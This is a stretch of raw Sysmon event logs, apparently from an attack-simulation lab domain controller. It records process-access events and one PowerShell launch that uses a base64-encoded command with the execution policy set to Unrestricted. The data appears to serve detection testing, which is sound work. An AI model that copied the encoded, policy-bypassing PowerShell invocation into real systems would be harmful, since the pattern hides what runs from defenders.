15:52:07.354{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003129Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.354{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003128Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.354{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003127Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.354{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003126Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.354{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CA7-5FA1-9500-000000008801}2600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003125Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.354{D28789B6-7CA7-5FA1-9400-000000008801}12522308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CA7-5FA1-9500-000000008801}2600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+316b32a9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b54133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b53e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31605469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b1499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b72e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b564ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b564ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b5635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b482e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b54817(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b5440a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b54133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b53e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31605469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b3ac65(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b3a235(wow64) 154100x80000000000000003124Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.364{D28789B6-7CA7-5FA1-9500-000000008801}2600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CA7-5FA1-A343-060000000000}0x643a30HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CA7-5FA1-9400-000000008801}1252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000003123Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.307{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CA7-5FA1-9400-000000008801}1252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003122Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.307{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CA7-5FA1-9400-000000008801}1252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003121Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.260{D28789B6-7CA7-5FA1-9400-000000008801}1252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_f0isowva.ozj.ps12020-11-03 15:52:07.260 10341000x80000000000000003120Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.244{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CA7-5FA1-9400-000000008801}1252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003119Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.229{D28789B6-7CA7-5FA1-9200-000000008801}5048668C:\Windows\system32\conhost.exe{D28789B6-7CA7-5FA1-9400-000000008801}1252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003118Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.229{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003117Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.229{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003116Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.229{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003115Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.229{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003114Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.229{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003113Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.229{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003112Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 